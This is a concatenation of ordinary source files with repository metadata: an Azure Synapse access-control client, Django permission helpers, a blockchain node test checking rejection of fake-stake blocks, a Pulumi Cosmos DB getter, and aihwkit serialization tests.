return cls(pipeline_response, deserialized, {})
return deserialized
get_role_assignment_by_id.metadata = {'url': '/rbac/roleAssignments/{roleAssignmentId}'} # type: ignore
def delete_role_assignment_by_id(
self,
role_assignment_id, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Delete role assignment by role assignment Id.
:param role_assignment_id: The ID of the role assignment.
:type role_assignment_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.delete_role_assignment_by_id.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'roleAssignmentId': self._serialize.url("role_assignment_id", role_assignment_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_role_assignment_by_id.metadata = {'url': '/rbac/roleAssignments/{roleAssignmentId}'} # type: ignore
def get_caller_role_assignments(
self,
**kwargs # type: Any
):
# type: (...) -> List[str]
"""List role assignments of the caller.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of str, or the result of cls(response)
:rtype: list[str]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.get_caller_role_assignments.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('[str]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_caller_role_assignments.metadata = {'url': '/rbac/getMyAssignedRoles'} # type: ignore
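# Hypothetical usage sketch (illustrative comment only; the client construction,
# endpoint value and names below are assumptions, not taken from this file):
#
#     client = AccessControlClient(credential, endpoint="https://<workspace>.dev.azuresynapse.net")
#     for role in client.get_role_definitions():        # ItemPaged follows next_link pages lazily
#         print(role.id, role.name)
#     options = RoleAssignmentOptions(role_id="<role-guid>", principal_id="<aad-object-id>")
#     assignment = client.create_role_assignment(options)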
| 46.222973
| 144
| 0.655411
|
4bb9be3e8038b885810a8d692e4f35e6bec65ccd
| 2,118
|
py
|
Python
|
mooringlicensing/helpers.py
|
GraemeMuller/mooringlicensing
|
2b2594189fb88f4add3fbc979a60a05397aaa491
|
[
"Apache-2.0"
] | null | null | null |
mooringlicensing/helpers.py
|
GraemeMuller/mooringlicensing
|
2b2594189fb88f4add3fbc979a60a05397aaa491
|
[
"Apache-2.0"
] | 2
|
2021-03-05T06:48:11.000Z
|
2021-03-26T08:14:17.000Z
|
mooringlicensing/helpers.py
|
GraemeMuller/mooringlicensing
|
2b2594189fb88f4add3fbc979a60a05397aaa491
|
[
"Apache-2.0"
] | 15
|
2021-03-02T01:40:12.000Z
|
2022-02-15T08:26:09.000Z
|
from __future__ import unicode_literals
from ledger.accounts.models import EmailUser
from django.conf import settings
import logging
logger = logging.getLogger(__name__)
def belongs_to(user, group_name):
"""
Check if the user belongs to the given group.
:param user:
:param group_name:
:return:
"""
return user.groups.filter(name=group_name).exists()
def is_model_backend(request):
# Return True if user logged in via single sign-on (i.e. an internal)
return 'ModelBackend' in request.session.get('_auth_user_backend')
def is_email_auth_backend(request):
# Return True if user logged in via social_auth (i.e. an external user signing in with a login-token)
return 'EmailAuth' in request.session.get('_auth_user_backend')
def is_mooringlicensing_admin(request):
#logger.info('settings.ADMIN_GROUP: {}'.format(settings.ADMIN_GROUP))
return request.user.is_authenticated() and is_model_backend(request) and in_dbca_domain(request) and (belongs_to(request.user, settings.ADMIN_GROUP))
def in_dbca_domain(request):
user = request.user
domain = user.email.split('@')[1]
if domain in settings.DEPT_DOMAINS:
if not user.is_staff:
# hack to reset department user to is_staff==True, if the user logged in externally (external departmentUser login defaults to is_staff=False)
user.is_staff = True
user.save()
return True
return False
def is_in_organisation_contacts(request, organisation):
return request.user.email in organisation.contacts.all().values_list('email', flat=True)
def is_departmentUser(request):
return request.user.is_authenticated() and is_model_backend(request) and in_dbca_domain(request)
def is_customer(request):
# return request.user.is_authenticated() and is_email_auth_backend(request)
return request.user.is_authenticated() and (is_model_backend(request) or is_email_auth_backend(request))
def is_internal(request):
return is_departmentUser(request)
def get_all_officers():
return EmailUser.objects.filter(groups__name='Commercial Operator Admin')
| 37.821429
| 154
| 0.752597
|
e5aac0dc5b07eb1018cf4c7046cae715f8f4b3ff
| 4,022
|
py
|
Python
|
test/functional/p2p_zpos_fakestake.py
|
pacificao/agrarian
|
184ece190c9f531f16546f4e9d3f8f2ee5d28a28
|
[
"MIT"
] | null | null | null |
test/functional/p2p_zpos_fakestake.py
|
pacificao/agrarian
|
184ece190c9f531f16546f4e9d3f8f2ee5d28a28
|
[
"MIT"
] | null | null | null |
test/functional/p2p_zpos_fakestake.py
|
pacificao/agrarian
|
184ece190c9f531f16546f4e9d3f8f2ee5d28a28
|
[
"MIT"
] | 1
|
2022-02-10T12:39:58.000Z
|
2022-02-10T12:39:58.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2019 The PIVX developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Covers the scenario of a zPoS block where the coinstake input is a zerocoin spend
of an already spent coin.
'''
from time import sleep
from test_framework.authproxy import JSONRPCException
from fake_stake.base_test import Agrarian_FakeStakeTest
class zPoSFakeStake(Agrarian_FakeStakeTest):
def run_test(self):
self.description = "Covers the scenario of a zPoS block where the coinstake input is a zerocoin spend of an already spent coin."
self.init_test()
DENOM_TO_USE = 5000 # zc denomination
INITAL_MINED_BLOCKS = 321 # First mined blocks (rewards collected to mint)
MORE_MINED_BLOCKS = 301 # More blocks mined before spending zerocoins
self.NUM_BLOCKS = 2 # Number of spammed blocks
# 1) Starting mining blocks
self.log.info("Mining %d blocks to get to zPOS activation...." % INITAL_MINED_BLOCKS)
self.node.generate(INITAL_MINED_BLOCKS)
sleep(2)
# 2) Collect the possible prevouts and mint zerocoins with those
self.log.info("Collecting all unspent coins which we generated from mining...")
balance = self.node.getbalance("*", 100)
self.log.info("Minting zerocoins...")
initial_mints = 0
while balance > DENOM_TO_USE:
try:
self.node.mintzerocoin(DENOM_TO_USE)
except JSONRPCException:
break
sleep(1)
initial_mints += 1
self.node.generate(1)
sleep(1)
if initial_mints % 5 == 0:
self.log.info("Minted %d coins" % initial_mints)
if initial_mints >= 70:
break
balance = self.node.getbalance("*", 100)
self.log.info("Minted %d coins in the %d-denom, remaining balance %d", initial_mints, DENOM_TO_USE, balance)
sleep(2)
# 3) mine more blocks
self.log.info("Mining %d more blocks ... and getting spendable zerocoins" % MORE_MINED_BLOCKS)
self.node.generate(MORE_MINED_BLOCKS)
sleep(2)
mints = self.node.listmintedzerocoins(True, True)
mints_hashes = [x["serial hash"] for x in mints]
        # These mints are not all ready to spend yet; only a few of them are.
self.log.info("Got %d confirmed mints" % len(mints_hashes))
# 4) spend mints
self.log.info("Spending mints in block %d..." % self.node.getblockcount())
spends = 0
spent_mints = []
for mint in mints_hashes:
# create a single element list to pass to RPC spendzerocoinmints
mint_arg = []
mint_arg.append(mint)
try:
self.node.spendzerocoinmints(mint_arg)
sleep(1)
spends += 1
spent_mints.append(mint)
except JSONRPCException as e:
self.log.warning(str(e))
continue
sleep(1)
self.log.info("Successfully spent %d mints" % spends)
# 5) Start mining again so that spends get confirmed in a block.
self.log.info("Mining 5 more blocks...")
self.node.generate(5)
sleep(2)
# 6) Collect some prevouts for random txes
self.log.info("Collecting inputs for txes...")
spending_utxo_list = self.node.listunspent()
sleep(1)
# 7) Create "Fake Stake" blocks and send them
self.log.info("Creating Fake stake zPoS blocks...")
err_msgs = self.test_spam("Main", mints, spending_utxo_list=spending_utxo_list, fZPoS=True)
if not len(err_msgs) == 0:
self.log.error("result: " + " | ".join(err_msgs))
raise AssertionError("TEST FAILED")
self.log.info("%s PASSED" % self.__class__.__name__)
if __name__ == '__main__':
zPoSFakeStake().main()
| 37.588785
| 136
| 0.618846
|
f042407c11c1bc588dc2a12b65909abd5dfb47a4
| 4,913
|
py
|
Python
|
sdk/python/pulumi_azure_native/documentdb/v20191212/get_sql_resource_sql_database.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/documentdb/v20191212/get_sql_resource_sql_database.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/documentdb/v20191212/get_sql_resource_sql_database.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetSqlResourceSqlDatabaseResult',
'AwaitableGetSqlResourceSqlDatabaseResult',
'get_sql_resource_sql_database',
]
@pulumi.output_type
class GetSqlResourceSqlDatabaseResult:
"""
An Azure Cosmos DB SQL database.
"""
def __init__(__self__, id=None, location=None, name=None, resource=None, tags=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if resource and not isinstance(resource, dict):
raise TypeError("Expected argument 'resource' to be a dict")
pulumi.set(__self__, "resource", resource)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
The unique resource identifier of the ARM resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The location of the resource group to which the resource belongs.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the ARM resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def resource(self) -> Optional['outputs.SqlDatabaseGetPropertiesResponseResource']:
return pulumi.get(self, "resource")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of Azure resource.
"""
return pulumi.get(self, "type")
class AwaitableGetSqlResourceSqlDatabaseResult(GetSqlResourceSqlDatabaseResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSqlResourceSqlDatabaseResult(
id=self.id,
location=self.location,
name=self.name,
resource=self.resource,
tags=self.tags,
type=self.type)
def get_sql_resource_sql_database(account_name: Optional[str] = None,
database_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSqlResourceSqlDatabaseResult:
"""
An Azure Cosmos DB SQL database.
:param str account_name: Cosmos DB database account name.
:param str database_name: Cosmos DB database name.
:param str resource_group_name: Name of an Azure resource group.
"""
__args__ = dict()
__args__['accountName'] = account_name
__args__['databaseName'] = database_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:documentdb/v20191212:getSqlResourceSqlDatabase', __args__, opts=opts, typ=GetSqlResourceSqlDatabaseResult).value
return AwaitableGetSqlResourceSqlDatabaseResult(
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
resource=__ret__.resource,
tags=__ret__.tags,
type=__ret__.type)
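# Hypothetical usage sketch (illustrative comment only; the resource names are
# placeholders): the invoke returns a result object whose attributes map onto
# the getters defined in GetSqlResourceSqlDatabaseResult above.
#
#     db = get_sql_resource_sql_database(
#         account_name="my-cosmos-account",
#         database_name="my-database",
#         resource_group_name="my-resource-group")
#     print(db.id, db.name, db.type)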
| 37.219697
| 505
| 0.65113
|
d93b19b41e62c991ed4f600393fd0c2c3ec7da00
| 23,640
|
py
|
Python
|
tests/test_utils.py
|
portoise-yin/aihwkit
|
856530f7d782046fb094d1dc6ce5d9ce0159d8ff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
portoise-yin/aihwkit
|
856530f7d782046fb094d1dc6ce5d9ce0159d8ff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
portoise-yin/aihwkit
|
856530f7d782046fb094d1dc6ce5d9ce0159d8ff
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# (C) Copyright 2020, 2021 IBM. All Rights Reserved.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test for different utility functionality."""
from tempfile import TemporaryFile
from copy import deepcopy
from unittest import SkipTest
from numpy import array
from numpy.random import rand
from numpy.testing import assert_array_almost_equal, assert_raises
from torch import Tensor, load, save, device, manual_seed
from torch.nn import Module, Sequential
from torch.nn import Linear as torch_linear
from torch.nn.functional import mse_loss
from torch.optim import SGD
from aihwkit.nn import AnalogConv2d, AnalogSequential
from aihwkit.optim import AnalogSGD
from aihwkit.simulator.configs import SingleRPUConfig, FloatingPointRPUConfig
from aihwkit.simulator.configs.devices import ConstantStepDevice, LinearStepDevice
from aihwkit.simulator.configs.utils import IOParameters, UpdateParameters
from aihwkit.simulator.rpu_base import cuda
from aihwkit.exceptions import TileError, ModuleError
from aihwkit.nn.conversion import convert_to_analog
from .helpers.decorators import parametrize_over_layers
from .helpers.layers import Conv2d, Conv2dCuda, Linear, LinearCuda
from .helpers.testcases import ParametrizedTestCase
from .helpers.tiles import FloatingPoint, ConstantStep, Inference
@parametrize_over_layers(
layers=[Linear, Conv2d, LinearCuda, Conv2dCuda],
tiles=[FloatingPoint, ConstantStep, Inference],
biases=[True, False]
)
class SerializationTest(ParametrizedTestCase):
"""Tests for serialization."""
@staticmethod
def train_model(model, loss_func, x_b, y_b):
"""Train the model."""
opt = AnalogSGD(model.parameters(), lr=0.5)
opt.regroup_param_groups(model)
epochs = 1
for _ in range(epochs):
pred = model(x_b)
loss = loss_func(pred, y_b)
loss.backward()
opt.step()
opt.zero_grad()
@staticmethod
def get_layer_and_tile_weights(model):
"""Return the weights and biases of the model and the tile."""
weight = model.weight.data.detach().cpu().numpy()
if model.use_bias:
bias = model.bias.data.detach().cpu().numpy()
else:
bias = None
analog_weight, analog_bias = model.analog_tile.get_weights()
analog_weight = analog_weight.detach().cpu().numpy().reshape(weight.shape)
if model.use_bias:
analog_bias = analog_bias.detach().cpu().numpy()
else:
analog_bias = None
return weight, bias, analog_weight, analog_bias
def test_save_load_state_dict_train(self):
"""Test saving and loading using a state dict after training."""
model = self.get_layer()
# Perform an update in order to modify tile weights and biases.
loss_func = mse_loss
if isinstance(model, AnalogConv2d):
input_x = Tensor(rand(2, 2, 3, 3))*0.2
input_y = Tensor(rand(2, 3, 4, 4))*0.2
else:
input_x = Tensor(rand(2, model.in_features))*0.2
input_y = Tensor(rand(2, model.out_features))*0.2
if self.use_cuda:
input_x = input_x.cuda()
input_y = input_y.cuda()
self.train_model(model, loss_func, input_x, input_y)
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases,
tile_weights, tile_biases) = self.get_layer_and_tile_weights(model)
# now the tile weights should be out of sync
assert_raises(AssertionError, assert_array_almost_equal, model_weights, tile_weights)
if self.bias:
assert_raises(AssertionError, assert_array_almost_equal, model_biases, tile_biases)
# Save the model to a file.
with TemporaryFile() as file:
save(model.state_dict(), file)
# Create a new model and load its state dict.
file.seek(0)
new_model = self.get_layer()
new_model.load_state_dict(load(file))
            # Compare the new model weights and biases. They should now be in sync.
(new_model_weights, new_model_biases,
new_tile_weights, new_tile_biases) = self.get_layer_and_tile_weights(new_model)
assert_array_almost_equal(tile_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(tile_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
def test_save_load_model(self):
"""Test saving and loading a model directly."""
model = self.get_layer()
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases,
tile_weights, tile_biases) = self.get_layer_and_tile_weights(model)
assert_array_almost_equal(model_weights, tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, tile_biases)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Compare the new model weights and biases.
(new_model_weights, new_model_biases,
new_tile_weights, new_tile_biases) = self.get_layer_and_tile_weights(new_model)
assert_array_almost_equal(model_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
# Asserts over the AnalogContext of the new model.
self.assertTrue(hasattr(new_model.analog_tile.analog_ctx, 'analog_tile'))
self.assertIsInstance(new_model.analog_tile.analog_ctx.analog_tile,
model.analog_tile.__class__)
self.assertTrue(new_model.analog_tile.is_cuda == model.analog_tile.is_cuda)
def test_save_load_model_cross_device(self):
"""Test saving and loading a model directly."""
if not cuda.is_compiled():
raise SkipTest('CUDA not available.')
model = self.get_layer()
map_location = 'cuda'
if model.analog_tile.is_cuda:
map_location = 'cpu'
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases,
tile_weights, tile_biases) = self.get_layer_and_tile_weights(model)
assert_array_almost_equal(model_weights, tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, tile_biases)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file, map_location=device(map_location))
# Compare the new model weights and biases.
(new_model_weights, new_model_biases,
new_tile_weights, new_tile_biases) = self.get_layer_and_tile_weights(new_model)
assert_array_almost_equal(model_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
# Asserts over the AnalogContext of the new model.
self.assertTrue(hasattr(new_model.analog_tile.analog_ctx, 'analog_tile'))
self.assertIsInstance(new_model.analog_tile.analog_ctx.analog_tile,
model.analog_tile.__class__)
self.assertTrue(new_model.analog_tile.is_cuda != model.analog_tile.is_cuda)
if model.analog_tile.shared_weights is not None:
self.assertTrue(new_model.analog_tile.shared_weights.device.type == map_location)
def test_save_load_meta_parameter(self):
"""Test saving and loading a device with custom parameters."""
# Create the device and the array.
rpu_config = SingleRPUConfig(
forward=IOParameters(inp_noise=0.321),
backward=IOParameters(inp_noise=0.456),
update=UpdateParameters(desired_bl=78),
device=ConstantStepDevice(w_max=0.987)
)
model = self.get_layer(rpu_config=rpu_config)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
parameters = new_model.analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, 0.321)
self.assertAlmostEqual(parameters.backward_io.inp_noise, 0.456)
self.assertAlmostEqual(parameters.update.desired_bl, 78)
self.assertTrue(new_model.analog_tile.is_cuda == model.analog_tile.is_cuda)
def test_save_load_hidden_parameters(self):
"""Test saving and loading a device with hidden parameters."""
# Create the device and the array.
model = self.get_layer()
hidden_parameters = model.analog_tile.tile.get_hidden_parameters()
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
new_hidden_parameters = new_model.analog_tile.tile.get_hidden_parameters()
assert_array_almost_equal(hidden_parameters, new_hidden_parameters)
def test_save_load_alpha_scale(self):
"""Test saving and loading a device with alpha_scale."""
# Create the device and the array.
model = self.get_layer()
alpha = 2.0
model.analog_tile.tile.set_alpha_scale(alpha)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
alpha_new = new_model.analog_tile.tile.get_alpha_scale()
assert_array_almost_equal(array(alpha), array(alpha_new))
def test_save_load_shared_weights(self):
"""Test saving and loading a device with shared_weights."""
if isinstance(self.get_rpu_config(), FloatingPointRPUConfig):
raise SkipTest('Not available for FP')
# Create the device and the array.
model = self.get_layer()
shared_weights = None
if model.analog_tile.shared_weights is not None:
shared_weights = model.analog_tile.shared_weights.detach().cpu().numpy()
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
if shared_weights is not None:
new_shared_weights = new_model.analog_tile.shared_weights
assert_array_almost_equal(shared_weights, new_shared_weights.detach().cpu().numpy())
def test_save_load_weight_scaling_omega(self):
"""Test saving and loading a device with weight scaling omega."""
model = self.get_layer(weight_scaling_omega=0.5)
alpha = model.analog_tile.tile.get_alpha_scale()
self.assertNotEqual(alpha, 1.0)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
alpha_new = new_model.analog_tile.tile.get_alpha_scale()
assert_array_almost_equal(array(alpha), array(alpha_new))
def test_save_load_state_dict_hidden_parameters(self):
"""Test saving and loading via state_dict with hidden parameters."""
# Create the device and the array.
model = self.get_layer()
hidden_parameters = model.analog_tile.tile.get_hidden_parameters()
# Save the model to a file.
with TemporaryFile() as file:
save(model.state_dict(), file)
# Load the model.
file.seek(0)
new_model = self.get_layer()
new_model.load_state_dict(load(file))
# Assert over the new model tile parameters.
new_hidden_parameters = new_model.analog_tile.tile.get_hidden_parameters()
assert_array_almost_equal(hidden_parameters, new_hidden_parameters)
def test_state_dict_children_layers_sequential(self):
"""Test using the state_dict with children analog layers via Sequential."""
children_layer = self.get_layer()
model = Sequential(children_layer)
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases,
tile_weights, tile_biases) = self.get_layer_and_tile_weights(children_layer)
self.assertIn('0.analog_tile_state', model.state_dict())
# Update the state_dict of a new model.
new_children_layer = self.get_layer()
new_model = Sequential(new_children_layer)
new_model.load_state_dict(model.state_dict())
# Compare the new model weights and biases.
(new_model_weights, new_model_biases, new_tile_weights, new_tile_biases) = \
self.get_layer_and_tile_weights(new_children_layer)
assert_array_almost_equal(model_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
def test_state_dict_children_layers_subclassing(self):
"""Test using the state_dict with children analog layers via subclassing."""
class CustomModule(Module):
"""Module that defines its children layers via custom attributes."""
# pylint: disable=abstract-method
def __init__(self, layer: Module):
super().__init__()
self.custom_child = layer
children_layer = self.get_layer()
model = CustomModule(children_layer)
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases, tile_weights, tile_biases) = \
self.get_layer_and_tile_weights(children_layer)
self.assertIn('custom_child.analog_tile_state', model.state_dict())
# Update the state_dict of a new model.
new_children_layer = self.get_layer()
new_model = CustomModule(new_children_layer)
new_model.load_state_dict(model.state_dict())
# Compare the new model weights and biases.
(new_model_weights, new_model_biases, new_tile_weights, new_tile_biases) = \
self.get_layer_and_tile_weights(new_children_layer)
assert_array_almost_equal(model_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
def test_state_dict_analog_strict(self):
"""Test the `strict` flag for analog layers."""
model = self.get_layer()
state_dict = model.state_dict()
# Remove the analog key from the state dict.
del state_dict['analog_tile_state']
# Check that it fails when using `strict`.
with self.assertRaises(RuntimeError) as context:
model.load_state_dict(state_dict, strict=True)
self.assertIn('Missing key', str(context.exception))
# Check that it passes when not using `strict`.
model.load_state_dict(state_dict, strict=False)
def test_state_dict(self):
"""Test creating a new model using a state dict, without saving to disk."""
model = self.get_layer()
state_dict = model.state_dict()
new_model = self.get_layer()
new_model.load_state_dict(state_dict)
# Asserts over the AnalogContext of the new model.
self.assertTrue(hasattr(new_model.analog_tile.analog_ctx, 'analog_tile'))
self.assertIsInstance(new_model.analog_tile.analog_ctx.analog_tile,
model.analog_tile.__class__)
def test_hidden_parameter_mismatch(self):
"""Test for error if tile structure mismatches."""
model = self.get_layer()
state_dict = model.state_dict()
# Create the device and the array.
rpu_config = SingleRPUConfig(
device=LinearStepDevice() # different hidden structure
)
new_model = self.get_layer(rpu_config=rpu_config)
if new_model.analog_tile.__class__.__name__ != model.analog_tile.__class__.__name__:
with self.assertRaises(TileError):
                new_model.load_state_dict(state_dict)
def test_load_state_load_rpu_config(self):
"""Test creating a new model using a state dict, while using a different RPU config."""
# Create the device and the array.
rpu_config_org = self.get_rpu_config()
# Skipped for FP
if isinstance(rpu_config_org, FloatingPointRPUConfig):
raise SkipTest('Not available for FP')
rpu_config_org.forward.is_perfect = False
old_value = 0.11
rpu_config_org.forward.inp_noise = old_value
model = self.get_layer(rpu_config=rpu_config_org)
state_dict = model.state_dict()
rpu_config = deepcopy(rpu_config_org)
new_value = 0.51
rpu_config.forward.inp_noise = new_value
# Test restore_rpu_config=False
new_model = self.get_layer(rpu_config=rpu_config)
new_model.load_state_dict(state_dict, load_rpu_config=False)
parameters = new_model.analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, new_value)
# Test restore_rpu_config=True
new_model = self.get_layer(rpu_config=rpu_config)
new_model.load_state_dict(state_dict, load_rpu_config=True)
parameters = new_model.analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, old_value)
def test_load_state_load_rpu_config_sequential(self):
"""Test creating a new model using a state dict, while using a different RPU config."""
# Create the device and the array.
rpu_config_org = self.get_rpu_config()
# Skipped for FP
if isinstance(rpu_config_org, FloatingPointRPUConfig):
raise SkipTest('Not available for FP')
rpu_config_org.forward.is_perfect = False
old_value = 0.11
rpu_config_org.forward.inp_noise = old_value
model = AnalogSequential(self.get_layer(rpu_config=rpu_config_org))
state_dict = model.state_dict()
rpu_config = deepcopy(rpu_config_org)
new_value = 0.51
rpu_config.forward.inp_noise = new_value
# Test restore_rpu_config=False
new_model = AnalogSequential(self.get_layer(rpu_config=rpu_config))
new_model.load_state_dict(state_dict, load_rpu_config=False)
parameters = new_model[0].analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, new_value)
# Test restore_rpu_config=True
new_model = AnalogSequential(self.get_layer(rpu_config=rpu_config))
new_model.load_state_dict(state_dict, load_rpu_config=True)
parameters = new_model[0].analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, old_value)
def test_load_state_load_rpu_config_wrong(self):
"""Test creating a new model using a state dict, while using a different RPU config."""
# Skipped for FP
if isinstance(self.get_rpu_config(), FloatingPointRPUConfig):
raise SkipTest('Not available for FP')
# Create the device and the array.
model = self.get_layer()
state_dict = model.state_dict()
rpu_config = FloatingPointRPUConfig()
new_model = self.get_layer(rpu_config=rpu_config)
assert_raises(ModuleError, new_model.load_state_dict, state_dict, load_rpu_config=False)
@parametrize_over_layers(
layers=[Linear, LinearCuda],
tiles=[FloatingPoint],
biases=[False]
)
class SerializationTestExtended(ParametrizedTestCase):
"""Tests for serialization."""
@staticmethod
def train_model_torch(model, loss_func, x_b, y_b):
"""Train the model with torch SGD."""
opt = SGD(model.parameters(), lr=0.5)
epochs = 100
for _ in range(epochs):
opt.zero_grad()
